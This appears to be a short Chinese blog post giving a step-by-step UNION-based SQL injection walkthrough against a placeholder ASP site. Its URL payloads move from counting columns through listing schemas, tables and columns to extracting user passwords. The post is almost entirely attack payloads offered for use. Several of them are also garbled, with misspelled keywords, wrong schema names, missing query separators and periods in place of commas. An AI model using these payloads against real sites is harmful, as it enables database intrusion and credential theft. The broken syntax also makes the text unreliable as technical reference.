SQl注入手法

Posted 2020-11-21 52xuege

网站http://www.xxxx.com/xxxx/1.Asp?id=1

一、常规注入

　　1.猜字段http://www.xxxx.com/xxxx/1.Asp?id=1+oder+by+X        X=(1.2.3.4.5.6.....)直至网站访问正常为止。

　　2.查询数据库等http://www.xxxx.com/xxxx/1.Asp?id=1+union+select 1.2.3.database().version() 获取数据库等信息

　　　　或union+select+schema_name+from+information-schema.schemata猜数据库

　　3.获取数据库下面的所有表明信息 http://www.xxxx.com/xxxx/1.Aspid=1

　　　　+union+select+1.2.3.4.from+information_schema.tables+where+table_schema=‘数据库名字‘

　　4.获取表明下的用户信息http://www.xxxx.com/xxxx/1.Aspid=1

　　　　+union+select+1.2.3.4.from+information_columns.name+where+table_name=‘表明‘

　　5.获取指定用户数据信息

　　　　http://www.xxxx.com/xxxx/1.Aspid=1+union+select+1.password.3.4.from+用户名